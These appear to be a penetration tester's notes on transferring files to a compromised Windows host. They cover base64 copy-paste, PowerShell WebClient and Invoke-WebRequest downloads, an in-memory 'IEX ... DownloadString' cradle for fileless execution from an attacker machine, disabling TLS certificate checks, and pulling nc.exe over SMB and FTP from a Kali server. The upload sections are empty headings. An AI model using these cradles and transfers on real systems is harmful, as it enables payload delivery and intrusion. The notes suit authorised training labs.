Windows File Transfer

# PowerShell Base64 String Copy+Paste ```bash #encode file on Linux md5sum file #create and save to later confirm file integreity after transfer cat file |base64 -w 0;echo #output base64 encoded string to stdout ``` ```powershell #copy+paste encoded string into Windows [IO.File]::WriteAllBytes("C:\Users\Public\<file_name>", [Convert]::FromBase64String("<string>")) #decode base64 string Get-FileHash C:\Users\Public\<file_name> -Algorithm md5 #compare againts previous hash to confirm integrity #NOTE: cmd.exe has a maximum string length of 8,191 characters ``` # Powershell Web Download - typically HTTP and HTTPS are open to outbound traffic - defender may prevent download of some file types like `shell.exe` - use the `system.net.webclient class` to download over HTTP, HTTPS, or FTP ```powershell (New-Object Net.WebClient).DownloadFile('<Target File URL>','<Output File Name>') #NOTE: target file could be on GitHub or hosted by attacker machine ``` | WebClient Method | Description | | ------------------- | ------------------------------------------------------------------------------------------- | | OpenRead | Returns the data from a resource as a stream | | OpenReadAsync | Returns the data from a resource without blocking the calling thread | | DownloadData | Downloads data from a resource and returns a Byte array | | DownloadDataAsync | Downloads data from a resource and returns a Byte array without blocking the calling thread | | DownloadFile | Downloads data from a resource to a local file | | DownloadFIleAsync | Downloads data from a resource to a local file without blocking the calling thread | | DownloadString | Downloads a String from a resource and returns a string | | DownloadStringAsync | Downloads a String from a resourcewithout blocking the calling thread | - PowerShell can also be used to perform fileless attacks. Instead of downloading a PowerShell script to disk, we can run it directly in memory using the [Invoke-Expression](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.2) cmdlet or the alias `IEX` ```powershell IEX (New-Object Net.WebClient).DownloadString('<Target File URL>') #directly run target file in memory (New-Object Net.WebClient).DownloadString('<Target File URL>') | IEX #pipeline input from WebClient to IEX #NOTE: target file could be on GitHub or hosted by attacker machine ``` - With powershell 3.0 onwards, the [Invoke-WebRequest](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.2) cmdlet is also available, but it is noticeably slower at downloading files. You can use the aliases `iwr`, `curl`, and `wget` instead of the `Invoke-WebRequest` full name ```powershell Invoke-WebRequest <Target File URL> -OutFile file_name.ps1 #NOTE: target file could be on GitHub or hosted by attacker machine ``` ## Common Errors with PowerShell - When the IE first-lauch configuration has not been completed, download may be prevented. Add below flag to PS download commands: - Add `-UseBasicParsing` flag to `Invoke-WebRequest` or `IEX` - When encountering errors related to the SSL/TLS secure channel if the certificate is not trusted, execute following PS command and retry download command: - `[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}` # SMB Downloads - leverage SMB (TCP/445) to download files to target Windows machine from attacker Kali machine - First, create an SMB server on Kali and host file - Second, user `copy`, `move`, powershell `Copy-Item`, or the like to pull file from Kali SMB server ## Create SMB Server on Linux ```bash sudo impacket-smbserver share -smb2support /tmp/share #host files in /tmp/share via SMB sudo impacket-smbserver share -smb2support /tmp/share -user test -password test #hpost files with test:test authentication #impacket-smbserver = smbserver.py #here 'share' = share name ``` ## Copy File from SMB Server ```cmd copy \\<kali_host_ip>\share\nc.exe ``` ## Mount SMB Share with Username:Password Authentication ```cmd #newer Windows versions unauthenticated guest access to shares net use n: \\<kali_host_ip>\share /user:test test #mount share copy n:\nc.exe #copy from mounted share ``` # FTP Downloads - Setup FTP server on Kali host ```bash sudo pip3 install pyftpdlib #intall python module sudo python3 -m pyftpdlib --port 21 #initialize FTP server and specify port, by default this module uses port 2121 ``` - Download files from FTP Server using PowerShell ```powershell (New-Object Net.WebClient).DownloadFile('ftp://<kali_host_ip>/file.txt', 'C:\Users\Public\ftp-file.txt') ``` - If we don't have an interactive shell on remote machine to access PowerShell, use the below steps to create an FTP command file to download file from FTP server ```cmd-session C:\htb> echo open <kali_host_ip> > ftpcommand.txt C:\htb> echo USER anonymous >> ftpcommand.txt C:\htb> echo binary >> ftpcommand.txt C:\htb> echo GET file.txt >> ftpcommand.txt C:\htb> echo bye >> ftpcommand.txt C:\htb> ftp -v -n -s:ftpcommand.txt #command to execute FTP command file #below are automated steps base don FTP command file ftp> open <kali_host_ip> Log in with USER and PASS first. ftp> USER anonymous ftp> GET file.txt ftp> bye C:\htb>more file.txt #cat the received file This is a test file ``` # Upload Operations - Situations may occur, such as password cracking, analysis, exfiltration, etc., where we must upload files from our target machine into our Kali host ## PowerShell Base64 Copy+Paste ## PowerShell Web Uploads - Configure upload server on Kali host ## SMB Uploads ## FTP Uploads